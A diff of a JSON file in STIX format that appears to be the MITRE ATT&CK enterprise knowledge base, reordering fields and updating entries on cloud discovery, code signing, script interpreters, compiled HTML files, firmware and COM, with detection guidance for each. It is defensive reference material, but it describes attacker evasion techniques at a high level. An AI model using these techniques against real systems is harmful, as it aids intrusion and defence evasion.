+ "AWS",
+ "GCP",
+ "Azure",
+ "Office 365",
+ "Azure AD"
+ ]
},
{
"external_references": [
@@ -3590,6 +3653,18 @@
],
"modified": "2020-03-13T20:05:15.448Z",
"created": "2020-02-21T21:08:36.570Z",
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "Office 365 account logs",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"AWS",
"GCP",
@@ -3597,18 +3672,6 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_data_sources": [
- "Azure activity logs",
- "Office 365 account logs",
- "Process monitoring",
- "Process command-line parameters"
]
},
{
@@ -3662,6 +3725,19 @@
],
"modified": "2020-03-23T21:59:36.729Z",
"created": "2020-03-13T20:36:57.378Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Perform regular audits of cloud accounts to detect abnormal or malicious activity, such as accessing information outside of the normal function of the account or account usage at atypical hours.",
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "Authentication logs",
+ "AWS CloudTrail logs",
+ "Stackdriver logs"
+ ],
"x_mitre_platforms": [
"AWS",
"GCP",
@@ -3669,20 +3745,7 @@
"SaaS",
"Azure AD",
"Office 365"
- ],
- "x_mitre_data_sources": [
- "Azure activity logs",
- "Authentication logs",
- "AWS CloudTrail logs",
- "Stackdriver logs"
- ],
- "x_mitre_detection": "Perform regular audits of cloud accounts to detect abnormal or malicious activity, such as accessing information outside of the normal function of the account or account usage at atypical hours.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
"external_references": [
@@ -3728,22 +3791,22 @@
],
"modified": "2020-03-12T19:25:12.782Z",
"created": "2020-02-21T21:15:33.222Z",
- "x_mitre_platforms": [
- "Office 365",
- "Azure AD"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"Azure activity logs",
"Office 365 account logs",
"API monitoring",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Office 365",
+ "Azure AD"
]
},
{
@@ -3810,21 +3873,21 @@
],
"modified": "2020-03-25T18:18:20.366Z",
"created": "2020-02-11T18:47:46.619Z",
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure"
+ "x_mitre_contributors": [
+ "Praetorian"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\n",
"x_mitre_data_sources": [
"Authentication logs",
"AWS CloudTrail logs",
"Azure activity logs"
],
- "x_mitre_contributors": [
- "Praetorian"
+ "x_mitre_detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\n",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
]
},
{
@@ -3859,59 +3922,75 @@
"phase_name": "discovery"
}
],
- "modified": "2019-10-23T14:19:37.289Z",
+ "modified": "2020-07-14T19:19:00.966Z",
"created": "2019-08-30T18:11:24.582Z",
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure",
- "Azure AD",
- "Office 365"
- ],
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)",
"x_mitre_data_sources": [
"Office 365 audit logs",
"Azure activity logs",
"Stackdriver logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure",
+ "Azure AD",
+ "Office 365"
+ ]
},
{
+ "created": "2019-08-30T13:01:10.120Z",
+ "modified": "2020-06-23T14:31:41.758Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db",
+ "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. \n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)",
+ "name": "Cloud Service Discovery",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
- "external_id": "T1526",
"source_name": "mitre-attack",
+ "external_id": "T1526",
"url": "https://attack.mitre.org/techniques/T1526"
},
+ {
+ "source_name": "Azure - Resource Manager API",
+ "url": "https://docs.microsoft.com/en-us/rest/api/resources/",
+ "description": "Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Azure AD Graph API",
+ "url": "https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview",
+ "description": "Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020."
+ },
+ {
+ "source_name": "Azure - Stormspotter",
+ "url": "https://github.com/Azure/Stormspotter",
+ "description": "Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020."
+ },
{
"source_name": "GitHub Pacu",
"url": "https://github.com/RhinoSecurityLabs/pacu",
"description": "Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Cloud Service Discovery",
- "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ depending on if it's platform-as-a-service (PaaS), infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many different services exist throughout the various cloud providers and can include continuous integration and continuous delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment.\n\nPacu, an open source AWS exploitation framework, supports several methods for discovering cloud services.(Citation: GitHub Pacu)",
- "id": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
- ],
- "modified": "2019-10-17T19:11:02.353Z",
- "created": "2019-08-30T13:01:10.120Z",
"x_mitre_platforms": [
"AWS",
"GCP",
@@ -3921,18 +4000,20 @@
"SaaS"
],
"x_mitre_contributors": [
+ "Suzy Schapperle - Microsoft Azure Red Team",
"Praetorian"
],
"x_mitre_permissions_required": [
"User"
],
- "x_mitre_version": "1.0",
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Azure activity logs",
"Stackdriver logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment."
+ "x_mitre_detection": "Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nNormal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.",
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--1b84d551-6de8-4b96-9930-d177677c3b1d",
@@ -3970,6 +4051,22 @@
"created": "2017-05-31T21:31:26.474Z"
},
{
+ "created": "2020-02-05T16:27:37.784Z",
+ "modified": "2020-02-10T19:51:01.601Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
+ "name": "Code Signing",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -3992,22 +4089,6 @@
"source_name": "Symantec Digital Certificates"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Code Signing",
- "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ",
- "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-02-10T19:51:01.601Z",
- "created": "2020-02-05T16:27:37.784Z",
"x_mitre_platforms": [
"macOS",
"Windows"
@@ -4026,7 +4107,7 @@
"id": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Command and Scripting Interpreter",
- "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, many Linux distributions include [Bash](https://attack.mitre.org/techniques/T1059/004) as a default shell while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also additional third-party interpreters, such as [Python](https://attack.mitre.org/techniques/T1059/006), that may also be cross-platform.",
+ "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -4045,31 +4126,32 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T17:44:07.939Z",
+ "modified": "2020-06-25T03:32:51.380Z",
"created": "2017-05-31T21:30:49.546Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "Windows Registry",
- "Windows event logs",
- "PowerShell logs",
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.",
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\n\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+ "x_mitre_data_sources": [
+ "Windows event logs",
+ "PowerShell logs",
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_remote_support": false,
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Commonly Used Port",
+ "description": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol. \n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -4082,10 +4164,35 @@
"source_name": "University of Birmingham C2"
}
],
- "revoked": true,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "revoked": false,
"type": "attack-pattern",
- "modified": "2020-03-14T18:19:14.698Z",
- "created": "2017-05-31T21:30:42.657Z"
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "modified": "2020-07-06T17:54:28.071Z",
+ "created": "2017-05-31T21:30:42.657Z",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Netflow/Enclave netflow",
+ "Process use of network",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef",
@@ -4109,20 +4216,21 @@
"phase_name": "command-and-control"
}
],
- "modified": "2019-07-16T20:53:20.583Z",
+ "modified": "2020-07-14T19:44:50.871Z",
"created": "2017-05-31T21:31:09.379Z",
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "File monitoring",
- "Data loss prevention"
- ],
- "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.",
- "x_mitre_network_requirements": false,
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ]
+ ],
+ "x_mitre_network_requirements": false,
+ "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Data loss prevention"
+ ],
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -4150,6 +4258,22 @@
"created": "2019-04-25T20:53:07.719Z"
},
{
+ "created": "2020-03-16T15:30:57.711Z",
+ "modified": "2020-03-29T20:59:32.293Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
+ "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
+ "name": "Compile After Delivery",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -4167,22 +4291,6 @@
"description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Compile After Delivery",
- "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
- "id": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T20:59:32.293Z",
- "created": "2020-03-16T15:30:57.711Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -4256,7 +4364,7 @@
},
{
"id": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d",
- "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
+ "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
"name": "Compiled HTML File",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -4301,28 +4409,28 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T21:04:50.295Z",
+ "modified": "2020-06-20T22:32:24.589Z",
"created": "2020-01-23T18:53:54.377Z",
- "x_mitre_contributors": [
- "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"
+ "x_mitre_platforms": [
+ "Windows"
],
+ "x_mitre_detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Application whitelisting"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"
]
},
{
@@ -4351,7 +4459,7 @@
],
"revoked": true,
"type": "attack-pattern",
- "modified": "2020-03-30T20:20:02.594Z",
+ "modified": "2020-07-07T16:44:26.493Z",
"created": "2017-05-31T21:31:22.374Z"
},
{
@@ -4396,33 +4504,33 @@
],
"modified": "2020-03-23T23:48:33.904Z",
"created": "2019-12-19T20:21:21.669Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Ability to update component device firmware from the host operating system."
],
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host intrusion prevention systems",
+ "File monitoring"
+ ],
+ "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.",
"x_mitre_data_sources": [
"Component firmware",
"Process monitoring",
"Disk forensics",
"API monitoring"
],
- "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host intrusion prevention systems",
- "File monitoring"
- ],
- "x_mitre_permissions_required": [
- "SYSTEM"
- ],
- "x_mitre_system_requirements": [
- "Ability to update component device firmware from the host operating system."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
- "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [VBScript](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)",
